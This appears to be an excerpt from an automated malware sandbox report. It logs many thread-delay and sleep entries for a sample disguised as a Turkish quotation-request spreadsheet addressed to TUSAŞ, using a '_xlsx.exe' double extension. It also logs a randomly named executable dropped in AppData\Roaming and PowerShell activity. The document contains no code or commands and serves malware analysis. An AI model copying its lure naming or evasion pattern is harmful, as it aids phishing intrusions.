Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 598097	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 597969	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 597856	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 597749	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 597641	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 597531	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 597421	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 597313	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 597192	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 597063	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 596953	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 596844	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 596734	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 596625	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 596516	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 596406	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 596297	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 596188	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 596063	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 595937	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 595828	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 595705	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 595469	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 595359	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 595250	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 595141	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 595031	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 594922	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 594813	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 594703	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 594594	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 594484	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Thread delayed: delay time: 594375	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 599840
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 599718
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 599609
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 599497
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 599375
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 599265
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 599156
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 599046
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 598937
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 598827
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 598718
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 598609
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 598500
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 598390
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 598281
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 598171
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 598062
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 597952
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 597843
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 597734
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 597625
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 597515
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 597394
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 597265
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 597156
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 597046
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 596937
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 596828
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 596718
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 596609
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 596499
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 596390
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 596281
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 596171
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 596062
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 595952
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 595843
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 595734
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 595624
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 595466
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 595343
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 595234
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 595124
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 595015
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 594906
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 594796
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 594687
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 594578
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Thread delayed: delay time: 594466

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8898	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 601	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8788	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 672	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Window / User API: threadDelayed 4663	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Window / User API: threadDelayed 5174	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Window / User API: threadDelayed 1602
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe	Window / User API: threadDelayed 8248

Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe TID: 516	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2024	Thread sleep count: 8898 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6204	Thread sleep time: -12912720851596678s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3048	Thread sleep count: 601 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2720	Thread sleep time: -10145709240540247s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe TID: 1616	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe TID: 1616	Thread sleep time: -31359464925306218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe TID: 1616	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe TID: 6112	Thread sleep count: 4663 > 30	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe TID: 1616	Thread sleep time: -599813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe TID: 1616	Thread sleep time: -599702s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe TID: 6112	Thread sleep count: 5174 > 30	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe TID: 1616	Thread sleep time: -599593s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe TID: 1616	Thread sleep time: -599484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe TID: 1616	Thread sleep time: -599375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe TID: 1616	Thread sleep time: -599266s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe TID: 1616	Thread sleep time: -599120s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe TID: 1616	Thread sleep time: -599000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe TID: 1616	Thread sleep time: -598891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe TID: 1616	Thread sleep time: -598781s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe TID: 1616	Thread sleep time: -598672s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe TID: 1616	Thread sleep time: -598563s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe TID: 1616	Thread sleep time: -598448s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe TID: 1616	Thread sleep time: -598328s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe TID: 1616	Thread sleep time: -598219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe TID: 1616	Thread sleep time: -598097s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe TID: 1616	Thread sleep time: -597969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe TID: 1616	Thread sleep time: -597856s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe TID: 1616	Thread sleep time: -597749s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe TID: 1616	Thread sleep time: -597641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe TID: 1616	Thread sleep time: -597531s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe TID: 1616	Thread sleep time: -597421s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe TID: 1616	Thread sleep time: -597313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe TID: 1616	Thread sleep time: -597192s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe TID: 1616	Thread sleep time: -597063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe TID: 1616	Thread sleep time: -596953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe TID: 1616	Thread sleep time: -596844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe TID: 1616	Thread sleep time: -596734s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe TID: 1616	Thread sleep time: -596625s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe TID: 1616	Thread sleep time: -596516s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe TID: 1616	Thread sleep time: -596406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe TID: 1616	Thread sleep time: -596297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe TID: 1616	Thread sleep time: -596188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe TID: 1616	Thread sleep time: -596063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe TID: 1616	Thread sleep time: -595937s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe TID: 1616	Thread sleep time: -595828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe TID: 1616	Thread sleep time: -595705s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe TID: 1616	Thread sleep time: -595578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe TID: 1616	Thread sleep time: -595469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe TID: 1616	Thread sleep time: -595359s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe TID: 1616	Thread sleep time: -595250s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe TID: 1616	Thread sleep time: -595141s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe TID: 1616	Thread sleep time: -595031s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe TID: 1616	Thread sleep time: -594922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe TID: 1616	Thread sleep time: -594813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe TID: 1616	Thread sleep time: -594703s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe TID: 1616	Thread sleep time: -594594s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe TID: 1616	Thread sleep time: -594484s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe TID: 1616	Thread sleep time: -594375s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe TID: 5692	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe TID: 3052	Thread sleep count: 34 > 30
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe TID: 3052	Thread sleep time: -31359464925306218s >= -30000s
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe TID: 3052	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe TID: 6912	Thread sleep count: 1602 > 30
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe TID: 3052	Thread sleep time: -599840s >= -30000s
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe TID: 6912	Thread sleep count: 8248 > 30
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe TID: 3052	Thread sleep time: -599718s >= -30000s
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe TID: 3052	Thread sleep time: -599609s >= -30000s
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe TID: 3052	Thread sleep time: -599497s >= -30000s
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe TID: 3052	Thread sleep time: -599375s >= -30000s
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe TID: 3052	Thread sleep time: -599265s >= -30000s
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe TID: 3052	Thread sleep time: -599156s >= -30000s
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe TID: 3052	Thread sleep time: -599046s >= -30000s
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe TID: 3052	Thread sleep time: -598937s >= -30000s
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe TID: 3052	Thread sleep time: -598827s >= -30000s
Source: C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe TID: 3052	Thread sleep time: -598718s >= -30000s
